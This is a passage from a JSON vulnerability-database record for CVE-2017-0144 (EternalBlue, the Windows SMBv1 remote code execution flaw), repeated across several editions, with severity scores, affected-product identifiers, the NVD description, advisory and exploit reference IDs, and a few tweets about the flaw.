"AVLEONOV:98069D08913ADA26D85B10C827D3FE97"], "type": "avleonov"}, {"idList": ["1337DAY-ID-27802", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27803", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613"], "type": "zdt"}, {"idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"], "type": "attackerkb"}, {"idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"], "type": "mmpc"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:42030", "EDB-ID:41891", "EDB-ID:42031"], "type": "exploitdb"}, {"idList": ["SMNTC-96704"], "type": "symantec"}, {"idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"], "type": "malwarebytes"}, {"idList": ["MS:CVE-2017-0144"], "type": "mscve"}, {"idList": ["RAPID7BLOG:5721EC0F74BC2FA3F661282E284C798A"], "type": "rapid7blog"}, {"idList": ["THN:EA407B51944632C248FEB495594123EA", "THN:E18080D17705880B2E7B69B8AB125EA9"], "type": "thn"}, {"idList": ["KLA11902", "KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:9EF85E0CE1D118D27911357B1C516074"], "type": "saint"}, {"idList": ["FIREEYE:399092589F455855881447C60B56C21A"], "type": "fireeye"}, {"idList": ["SSV:92952"], "type": "seebug"}, {"idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:142548", "PACKETSTORM:142603", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "exploitation": {"modified": "2021-02-02T06:36:30", "wildExploited": true, "wildExploitedSources": [{"idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"], "type": "attackerkb"}]}, "score": {"modified": "2021-02-02T06:36:30", "rev": 2, "value": 8.4, "vector": "NONE"}, "twitter": {"counter": 14, "modified": "2021-02-02T06:36:30", "tweets": [{"link": "https://twitter.com/sarah61289292/status/1362691554897494028", "text": "\u0644\u0645\u0627 \u062a\u0634\u063a\u0644 CVE-2017-0144 \u0639\u0644\u0649 \u0648\u064a\u0646\u062f\u0648\u0632 \u0661\u0660."}, {"link": "https://twitter.com/VulmonFeeds/status/1374009119766634500", "text": "CVE-2017-0144\n\nThe SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; ...\n\nhttps://t.co/foy373dLBH?amp=1"}, {"link": "https://twitter.com/AlqarniMazhood/status/1362380423721017347", "text": "\u0644\u0645\u0627 \u062a\u0634\u063a\u0644 CVE-2017-0144 \u0639\u0644\u0649 \u0648\u064a\u0646\u062f\u0648\u0632 \u0661\u0660. \n/hashtag/\u0633\u0647_\u0643\u062f\u062f\u062f\u0627?src=hashtag_click"}, {"link": "https://twitter.com/kitty14956590/status/1384943024250228740", "text": "when the CVE-2017-0144 sus"}, {"link": "https://twitter.com/mohannad_1saad1/status/1362746840261816323", "text": "\u0644\u0645\u0627 \u062a\u0634\u063a\u0644 CVE-2017-0144 \u0639\u0644\u0649 \u0648\u064a\u0646\u062f\u0648\u0632 \u0661\u0660. \n/hashtag/\u0643\u0627\u0633_\u0627\u0644\u0633\u0639\u0648\u062f\u064a\u0629_\u0627\u0644\u0639\u0627\u0644\u0645\u064a_\u0644\u0644\u062e\u062e\u062e\u062e\u062e\u064a\u0644?src=hashtag_click"}, {"link": "https://twitter.com/AllahibiReem/status/1362691966404861952", "text": "\u0644\u0645\u0627 \u062a\u0634\u063a\u0644 CVE-2017-0144 \u0639\u0644\u0649 \u0648\u064a\u0646\u062f\u0648\u0632 \u0661\u0660."}, {"link": "https://twitter.com/omaryazeed665/status/1362621178637135873", "text": "\u0644\u0645\u0627 \u062a\u0634\u063a\u0644 CVE-2017-0144 \u0639\u0644\u0649 \u0648\u064a\u0646\u062f\u0648\u0632 \u0661\u0660. \n/hashtag/\u064a\u0648\u0645_\u0627\u0644\u062c\u0645\u0639\u0647?src=hashtag_click"}, {"link": "https://twitter.com/bashayeralsallo/status/1362434722924818437", "text": "\u0644\u0645\u0627 \u062a\u0634\u063a\u0644 CVE-2017-0144 \u0639\u0644\u0649 \u0648\u064a\u0646\u062f\u0648\u0632 \u0661\u0660. \n/hashtag/\u0633\u0644\u0637\u0627\u0646?src=hashtag_click"}, {"link": "https://twitter.com/kitty14956590/status/1384942932843712514", "text": "when the CVE-2017-0144 sus"}, {"link": "https://twitter.com/Sid____/status/1382708880719933448", "text": "the most damaging one used by Russian govt. (and others) was CVE-2017-0144 commonly known as EternalBlue. We know why it will never make the \"list\"!"}]}}, "extraReferences": [{"name": "96704", "refsource": "BID", "tags": [], "url": "http://www.securityfocus.com/bid/96704"}, {"name": "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "refsource": "CONFIRM", "tags": [], "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf"}, {"name": "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf", "refsource": "CONFIRM", "tags": [], "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf"}, {"name": "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", "refsource": "MISC", "tags": [], "url": "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02"}, {"name": "41987", "refsource": "EXPLOIT-DB", "tags": [], "url": "https://www.exploit-db.com/exploits/41987/"}, {"name": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0144", "refsource": "CONFIRM", "tags": ["Vendor Advisory"], "url": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0144"}, {"name": "41891", "refsource": "EXPLOIT-DB", "tags": [], "url": "https://www.exploit-db.com/exploits/41891/"}, {"name": "1037991", "refsource": "SECTRACK", "tags": [], "url": "http://www.securitytracker.com/id/1037991"}, {"name": "42031", "refsource": "EXPLOIT-DB", "tags": [], "url": "https://www.exploit-db.com/exploits/42031/"}, {"name": "42030", "refsource": "EXPLOIT-DB", "tags": [], "url": "https://www.exploit-db.com/exploits/42030/"}, {"name": "http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html", "refsource": "MISC", "tags": [], "url": "http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html"}, {"name": "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "refsource": "MISC", "tags": [], "url": "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html"}], "hash": "a063f5e53ce6418d86d1343c37907985df07702604c698ddd12f6f0822c8609c", "hashmap": [{"hash": "732a831a7eed3955e8de18b2d8903bc8", "key": "cvss3"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "d931342d7091edb0db4db482c531ce39", "key": "cpeConfiguration"}, {"hash": "3d33672b05b572e15dc2cac26ad54d7c", "key": "title"}, {"hash": "f54a01beedb777f2ca261ddba30cf1a5", "key": "published"}, {"hash": "fb65e2b51285ba6bbdd4e82c86d7dbc3", "key": "extraReferences"}, {"hash": "e758f8fa39ce9e8de2ffe527ec8b6423", "key": "affectedSoftware"}, {"hash": "226da5129ffaaee3d5b48e506b957d58", "key": "cwe"}, {"hash": "8378623388dea1b8ea71bec9adacab2c", "key": "references"}, {"hash": "a173072793578541ea04b7baa0323592", "key": "cpe"}, {"hash": "d726e774add6189e33cf2ea0c61a2ba5", "key": "cvss"}, {"hash": "dd4a1fba31e29c6988f563bdeb65c80c", "key": "affectedConfiguration"}, {"hash": "6fd95f86c673c4a8b4f1fd51b22d928f", "key": "href"}, {"hash": "0751f4e56f29adf827144e01a128331d", "key": "cpe23"}, {"hash": "e9f80c9b0a5d969452d09ddbf4c74a71", "key": "description"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "e8dbb4c019811b96da3443b871bd4b26", "key": "cvss2"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "d68798550042e5272198c20ea65d8f01", "key": "modified"}, {"hash": "013b6203cead14382a8f19ad32d99966", "key": "cvelist"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0144", "id": "CVE-2017-0144", "immutableFields": [], "lastseen": "2021-02-02T06:36:30", "modified": "2018-06-21T01:29:00", "objectVersion": "1.5", "published": "2017-03-17T00:59:00", "references": ["https://www.exploit-db.com/exploits/42031/", "https://www.exploit-db.com/exploits/42030/", "http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html", "http://www.securityfocus.com/bid/96704", "http://www.securitytracker.com/id/1037991", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0144", "https://www.exploit-db.com/exploits/41891/", "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "https://www.exploit-db.com/exploits/41987/", "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf"], "reporter": "cve@mitre.org", "title": "CVE-2017-0144", "type": "cve", "viewCount": 301}, "different_elements": ["reporter", "cpeConfiguration"], "edition": 6, "lastseen": "2021-02-02T06:36:30"}, {"bulletin": {"affectedSoftware": [{"name": "microsoft server_message_block", "operator": "eq", "version": "1.0"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:microsoft:server_message_block:1.0"], "cpe23": [], "cvelist": ["CVE-2017-0144"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "cwe": ["CWE-20"], "description": "The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka \"Windows SMB Remote Code Execution Vulnerability.\" This vulnerability is different from those described in CVE-2017-0143, CVE-2017-0145, CVE-2017-0146, and CVE-2017-0148.", "edition": 3, "enchantments": {"dependencies": {"modified": "2020-02-05T13:14:20", "references": [{"idList": ["KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["KITPLOIT:9146046356497464176"], "type": "kitploit"}, {"idList": ["ICSMA-18-058-02"], "type": "ics"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["SECURELIST:CE501995262A06F4E132DE2F9C2B9B6C", "SECURELIST:094B9FCE59977DD96C94BBF6A95D339E"], "type": "securelist"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"], "type": "trendmicroblog"}, {"idList": ["THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:B0EAC6CA3FDF5A249CE4DD7AC3DD46BD"], "type": "threatpost"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"], "type": "openvas"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2", "AVLEONOV:C8B855FEC3E31BC28C624FF0B19272B7", "AVLEONOV:98069D08913ADA26D85B10C827D3FE97"], "type": "avleonov"}, {"idList": ["1337DAY-ID-27802", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27803", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613"], "type": "zdt"}, {"idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"], "type": "mmpc"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:42030", "EDB-ID:41891", "EDB-ID:42031"], "type": "exploitdb"}, {"idList": ["SMNTC-96704"], "type": "symantec"}, {"idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"], "type": "malwarebytes"}, {"idList": ["MS:CVE-2017-0144"], "type": "mscve"}, {"idList": ["THN:EA407B51944632C248FEB495594123EA", "THN:E18080D17705880B2E7B69B8AB125EA9"], "type": "thn"}, {"idList": ["SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:9EF85E0CE1D118D27911357B1C516074"], "type": "saint"}, {"idList": ["FIREEYE:399092589F455855881447C60B56C21A"], "type": "fireeye"}, {"idList": ["SSV:92952"], "type": "seebug"}, {"idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:142548", "PACKETSTORM:142603", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "score": {"modified": "2020-02-05T13:14:20", "rev": 2, "value": 8.4, "vector": "NONE"}}, "hash": "c005c86745705d48f8e7fca3f963c707f00265739ba6709ca4443c77261a7297", "hashmap": [{"hash": "732a831a7eed3955e8de18b2d8903bc8", "key": "cvss3"}, {"hash": "3d33672b05b572e15dc2cac26ad54d7c", "key": "title"}, {"hash": "f54a01beedb777f2ca261ddba30cf1a5", "key": "published"}, {"hash": "226da5129ffaaee3d5b48e506b957d58", "key": "cwe"}, {"hash": "8378623388dea1b8ea71bec9adacab2c", "key": "references"}, {"hash": "a173072793578541ea04b7baa0323592", "key": "cpe"}, {"hash": "d726e774add6189e33cf2ea0c61a2ba5", "key": "cvss"}, {"hash": "6fd95f86c673c4a8b4f1fd51b22d928f", "key": "href"}, {"hash": "e9f80c9b0a5d969452d09ddbf4c74a71", "key": "description"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "bcbed719525ad6e957360150b20c3c47", "key": "affectedSoftware"}, {"hash": "e8dbb4c019811b96da3443b871bd4b26", "key": "cvss2"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "d68798550042e5272198c20ea65d8f01", "key": "modified"}, {"hash": "013b6203cead14382a8f19ad32d99966", "key": "cvelist"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0144", "id": "CVE-2017-0144", "lastseen": "2020-02-05T13:14:20", "modified": "2018-06-21T01:29:00", "objectVersion": "1.3", "published": "2017-03-17T00:59:00", "references": ["https://www.exploit-db.com/exploits/42031/", "https://www.exploit-db.com/exploits/42030/", "http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html", "http://www.securityfocus.com/bid/96704", "http://www.securitytracker.com/id/1037991", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0144", "https://www.exploit-db.com/exploits/41891/", "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "https://www.exploit-db.com/exploits/41987/", "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf"], "reporter": "cve@mitre.org", "title": "CVE-2017-0144", "type": "cve", "viewCount": 231}, "differentElements": ["cpe23", "affectedSoftware"], "edition": 3, "lastseen": "2020-02-05T13:14:20"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "microsoft:server_message_block", "name": "microsoft server message block", "operator": "eq", "version": "1.0"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:microsoft:server_message_block:1.0"], "cpe23": ["cpe:2.3:a:microsoft:server_message_block:1.0:*:*:*:*:*:*:*"], "cpeConfiguration": {}, "cvelist": ["CVE-2017-0144"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "cwe": ["CWE-20"], "description": "The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka \"Windows SMB Remote Code Execution Vulnerability.\" This vulnerability is different from those described in CVE-2017-0143, CVE-2017-0145, CVE-2017-0146, and CVE-2017-0148.", "edition": 4, "enchantments": {"dependencies": {"modified": "2020-09-21T14:31:16", "references": [{"idList": ["KITPLOIT:9146046356497464176"], "type": "kitploit"}, {"idList": ["ICSMA-18-058-02"], "type": "ics"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["SECURELIST:CE501995262A06F4E132DE2F9C2B9B6C", "SECURELIST:094B9FCE59977DD96C94BBF6A95D339E"], "type": "securelist"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"], "type": "trendmicroblog"}, {"idList": ["THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:B0EAC6CA3FDF5A249CE4DD7AC3DD46BD"], "type": "threatpost"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"], "type": "openvas"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2", "AVLEONOV:C8B855FEC3E31BC28C624FF0B19272B7", "AVLEONOV:98069D08913ADA26D85B10C827D3FE97"], "type": "avleonov"}, {"idList": ["1337DAY-ID-27802", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27803", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613"], "type": "zdt"}, {"idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"], "type": "mmpc"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:42030", "EDB-ID:41891", "EDB-ID:42031"], "type": "exploitdb"}, {"idList": ["SMNTC-96704"], "type": "symantec"}, {"idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"], "type": "malwarebytes"}, {"idList": ["MS:CVE-2017-0144"], "type": "mscve"}, {"idList": ["THN:EA407B51944632C248FEB495594123EA", "THN:E18080D17705880B2E7B69B8AB125EA9"], "type": "thn"}, {"idList": ["KLA11902", "KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:9EF85E0CE1D118D27911357B1C516074"], "type": "saint"}, {"idList": ["FIREEYE:399092589F455855881447C60B56C21A"], "type": "fireeye"}, {"idList": ["SSV:92952"], "type": "seebug"}, {"idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:142548", "PACKETSTORM:142603", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "score": {"modified": "2020-09-21T14:31:16", "rev": 2, "value": 8.4, "vector": "NONE"}}, "hash": "df68563c5964afa2fb9d5d8a7085b5d6fee24ee461c4e9cd721b101b51605eab", "hashmap": [{"hash": "732a831a7eed3955e8de18b2d8903bc8", "key": "cvss3"}, {"hash": "3d33672b05b572e15dc2cac26ad54d7c", "key": "title"}, {"hash": "f54a01beedb777f2ca261ddba30cf1a5", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "e758f8fa39ce9e8de2ffe527ec8b6423", "key": "affectedSoftware"}, {"hash": "226da5129ffaaee3d5b48e506b957d58", "key": "cwe"}, {"hash": "8378623388dea1b8ea71bec9adacab2c", "key": "references"}, {"hash": "a173072793578541ea04b7baa0323592", "key": "cpe"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpeConfiguration"}, {"hash": "d726e774add6189e33cf2ea0c61a2ba5", "key": "cvss"}, {"hash": "6fd95f86c673c4a8b4f1fd51b22d928f", "key": "href"}, {"hash": "0751f4e56f29adf827144e01a128331d", "key": "cpe23"}, {"hash": "e9f80c9b0a5d969452d09ddbf4c74a71", "key": "description"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "e8dbb4c019811b96da3443b871bd4b26", "key": "cvss2"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "d68798550042e5272198c20ea65d8f01", "key": "modified"}, {"hash": "013b6203cead14382a8f19ad32d99966", "key": "cvelist"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0144", "id": "CVE-2017-0144", "lastseen": "2020-09-21T14:31:16", "modified": "2018-06-21T01:29:00", "objectVersion": "1.3", "published": "2017-03-17T00:59:00", "references": ["https://www.exploit-db.com/exploits/42031/", "https://www.exploit-db.com/exploits/42030/", "http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html", "http://www.securityfocus.com/bid/96704", "http://www.securitytracker.com/id/1037991", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0144", "https://www.exploit-db.com/exploits/41891/", "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "https://www.exploit-db.com/exploits/41987/", "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf"], "reporter": "cve@mitre.org", "title": "CVE-2017-0144", "type": "cve", "viewCount": 232}, "differentElements": ["affectedConfiguration", "cpeConfiguration"], "edition": 4, "lastseen": "2020-09-21T14:31:16"}, {"bulletin": {"affectedSoftware": [{"name": "microsoft server_message_block", "operator": "eq", "version": "1.0"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:microsoft:server_message_block:1.0"], "cpe23": [], "cvelist": ["CVE-2017-0144"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "cwe": ["CWE-20"], "description": "The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka \"Windows SMB Remote Code Execution Vulnerability.\" This vulnerability is different from those described in CVE-2017-0143, CVE-2017-0145, CVE-2017-0146, and CVE-2017-0148.", "edition": 2, "enchantments": {"dependencies": {"modified": "2019-10-04T12:18:44", "references": [{"idList": ["KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["KITPLOIT:9146046356497464176"], "type": "kitploit"}, {"idList": ["KB4013389", "KB4012598"], "type": "mskb"}, {"idList": 